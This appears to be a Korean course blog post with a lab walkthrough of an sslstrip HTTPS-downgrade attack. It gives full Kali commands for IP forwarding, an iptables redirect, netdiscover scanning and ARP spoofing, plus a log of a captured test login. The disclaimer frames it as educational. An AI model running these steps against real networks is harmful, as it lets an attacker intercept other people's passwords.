정보보안(구버전)/공격툴&정보수집 2016. 5. 26. 12:35
공격툴&정보수집 - 13. HTTPs 패스워드 크래킹
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
- sslstrip : https(443) 연결 요청을 http(80)으로 강제로 변경하는 툴
- 모든 HTTPs 해킹이 다 되는거는 아님
[참고] SSL
@ SSL(Secure Sockets Layer).txt
@ Kali Linux
- sslstrip 툴 설치 유무 확인 및 설치
root@kali:~# dpkg -l | grep sslstrip
ii sslstrip 0.9-1kali3 all SSL/TLS man-in-the-middle attack tool
root@kali:~# apt-get install sslstrip
패키지 목록을 읽는 중입니다... 완료
의존성 트리를 만드는 중입니다
상태 정보를 읽는 중입니다... 완료
sslstrip 패키지는 이미 최신 버전입니다.
0개 업그레이드, 0개 새로 설치, 0개 제거 및 121개 업그레이드 안 함.
- IP 포워딩 기능 활성화 및 PAT 설정 실시 (HTTP 80 -> 10000 리다이렉트 실시)
(터미널1)
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
root@kali:~# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 10000
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
- 공격 타겟 스켄 실시
root@kali:~# netdiscover -i eth1 -r 192.168.20.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 7 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.20.50 00:0c:29:d8:84:12 01 060 VMware, Inc.
192.168.20.100 00:0c:29:50:8a:5f 01 060 VMware, Inc.
192.168.20.100 00:0c:29:50:8a:69 01 060 VMware, Inc.
192.168.20.200 00:0c:29:72:28:7c 01 060 VMware, Inc.
192.168.20.201 00:0c:29:3e:92:78 01 060 VMware, Inc.
192.168.1.50 00:0c:29:d8:84:12 01 060 VMware, Inc.
192.168.1.254 00:50:56:fa:fc:1d 01 060 VMWare, Inc.
(ctrl+c)
- Window2008, Gateway 대상으로 ARP 스푸핑 실시
(터미널2)
root@kali:~# arpspoof -i eth1 -t 192.168.20.201 -r 192.168.20.100
~ 중간 생략 ~
- sslstrip 툴 시작
(터미널1)
root@kali:~# sslstrip -l 10000
sslstrip 0.9 by Moxie Marlinspike running...
@ Window2008
- Internet Explorer를 이용하여 'http://www.hotmail.com', 'http://www.apple.com' 접속 실시 및 로그인
- 로그인 정보 (abcd@test.com/abcd1234)
@ Kali Linux
- sslstrip 툴 동작 중지
root@kali:~# sslstrip -l 10000
sslstrip 0.9 by Moxie Marlinspike running...
(ctrl+c)
- sslstrip.log 확인
root@kali:~# cat sslstrip.log
2016-05-26 13:04:25,781 SECURE POST Data (login.live.com):
loginfmt=abcd@test.com&login=abcd@test.com&passwd=abcd1234&type=11&PPFT=De8PnoZdlop74KcE8nGG*ypS5t6upeX9zLohm5mhYl%21*lEkYvn4k2Wt%21yLX7nauWCcyN9i0hHB9VbdSGPFcRvSr0maI*VzOAF6rAsVduLA898PyIOyyNV6tzVPJLIFZt*v28iL0c93NjunNX80COjFg8VzXs*7vTh05UHwxCq69vPNxnmXt6HZWqa85YpRVyCiHcZxd8p7DaNsPcru9RMI0s0QVVueI4NudUZoZyN38IAeFTO7DzX4oQhnY98B*pGA%24%24&PPSX=Pas&NewUser=1&LoginOptions=3&FoundMSAs=&fspost=0&i2=1&i16=&i17=0&i18=__DefaultLogin_Strings%7C1%2C__DefaultLogin_Core%7C1%2C&i19=&i21=0&i22=0&i13=0
- ARP 스푸핑 해지
(터미널2)
root@kali:~# arpspoof -i eth1 -t 192.168.20.201 -r 192.168.20.100
~ 중간 생략 ~
(ctrl+c)
- iptables 추가 설정 삭제
root@kali:~# iptables -t nat -F PREROUTING
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
공격툴&정보수집 - 제13장 HTTPs 패스워드 크래킹 (sslstrip) https://youtu.be/17C4fZzUOV8
'정보보안(구버전) > 공격툴&정보수집' 카테고리의 다른 글
공격툴&정보수집 - 15. 말테고(maltego)를 이용한 정보 수집 (0) | 2016.05.26 |
---|---|
공격툴&정보수집 - 14. exploit-db 사이트 & 활용 방법(Bash Shell Shock) (0) | 2016.05.26 |
공격툴&정보수집 - 12. SNMP Sniffing 공격 (0) | 2016.05.25 |
공격툴&정보수집 - 11. DNS Spoofing 공격 (0) | 2016.05.25 |
공격툴&정보수집 - 10. Packet Sniffing 공격 (0) | 2016.05.25 |